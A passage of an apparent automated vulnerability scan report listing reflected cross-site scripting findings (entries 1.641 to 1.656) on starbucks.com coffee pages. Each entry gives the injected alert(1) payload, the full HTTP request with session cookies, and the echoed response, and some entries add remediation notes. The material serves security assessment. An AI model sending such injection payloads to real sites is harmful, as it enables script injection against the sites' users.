GET /coffee/starbucks-natural-fusions/savoring?d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:20:25 GMT Connection: close Content-Length: 40201
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?d4203"style="x:expression(alert(1))"93ec1632d62=1" /> ...[SNIP]...
1.641. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/vanilla
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fd5c"style="x:expression(alert(1))"93089c0b9ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/vanilla?4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:19:06 GMT Connection: close Content-Length: 41391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?4fd5c"style="x:expression(alert(1))"93089c0b9ff=1" /> ...[SNIP]...
1.642. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-reserve-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d779"style="x:expression(alert(1))"13c0978d7ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee?2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:24 GMT Connection: close Content-Length: 56951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?2d779"style="x:expression(alert(1))"13c0978d7ed=1" /> ...[SNIP]...
1.643. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48c38"style="x:expression(alert(1))"f99dc12b612 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:42 GMT Connection: close Content-Length: 42379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style="x:expression(alert(1))"f99dc12b612=1" /> ...[SNIP]...
1.644. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76daa"%3balert(1)//724980535d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76daa";alert(1)//724980535d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa"%3balert(1)//724980535d7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:44 GMT Connection: close Content-Length: 42284
1.645. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcf0f"style="x:expression(alert(1))"ad29da1d3f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:18:01 GMT Connection: close Content-Length: 41036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style="x:expression(alert(1))"ad29da1d3f1=1" /> ...[SNIP]...
1.646. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26c27"%3balert(1)//b005536df9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26c27";alert(1)//b005536df9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27"%3balert(1)//b005536df9f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:18:06 GMT Connection: close Content-Length: 40941
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2056f"style%3d"x%3aexpression(alert(1))"74970e702cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2056f"style="x:expression(alert(1))"74970e702cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style%3d"x%3aexpression(alert(1))"74970e702cd=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:48 GMT Connection: close Content-Length: 41081
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style="x:expression(alert(1))"74970e702cd=1" /> ...[SNIP]...
1.648. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c23"%3balert(1)//aabb77efc8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51c23";alert(1)//aabb77efc8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/starbucks-reserve-coffee/organic-blue-java?51c23"%3balert(1)//aabb77efc8a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:49 GMT Connection: close Content-Length: 40986
1.649. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e73"style="x:expression(alert(1))"e0a45db438b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:34 GMT Connection: close Content-Length: 40877
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style="x:expression(alert(1))"e0a45db438b=1" /> ...[SNIP]...
1.650. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac74"%3balert(1)//93e8ea141e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac74";alert(1)//93e8ea141e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74"%3balert(1)//93e8ea141e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:37 GMT Connection: close Content-Length: 40777
1.651. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c836e"%3balert(1)//ea1e4924121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c836e";alert(1)//ea1e4924121 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/via?c836e"%3balert(1)//ea1e4924121=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:16:54 GMT Connection: close Content-Length: 50298
1.652. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46d0d"style="x:expression(alert(1))"aec8401d6e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via?46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:16:48 GMT Connection: close Content-Length: 50393
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via?46d0d"style="x:expression(alert(1))"aec8401d6e5=1" /> ...[SNIP]...
1.653. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/flavored-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb780"style%3d"x%3aexpression(alert(1))"017ad330597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb780"style="x:expression(alert(1))"017ad330597 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via/flavored-coffee?bb780"style%3d"x%3aexpression(alert(1))"017ad330597=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:01 GMT Connection: close Content-Length: 50326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?bb780"style="x:expression(alert(1))"017ad330597=1" /> ...[SNIP]...
1.654. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b90"style="x:expression(alert(1))"6c41d8ffcf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via/instant-coffee?47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:17:06 GMT Connection: close Content-Length: 50600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?47b90"style="x:expression(alert(1))"6c41d8ffcf1=1" /> ...[SNIP]...
1.655. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70376"style%3d"x%3aexpression(alert(1))"4e8579796e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70376"style="x:expression(alert(1))"4e8579796e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee?70376"style%3d"x%3aexpression(alert(1))"4e8579796e6=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:16:10 GMT Connection: close Content-Length: 50980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?70376"style="x:expression(alert(1))"4e8579796e6=1" /> ...[SNIP]...
1.656. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/africa-arabia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4774c"style="x:expression(alert(1))"403ec5c4484 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
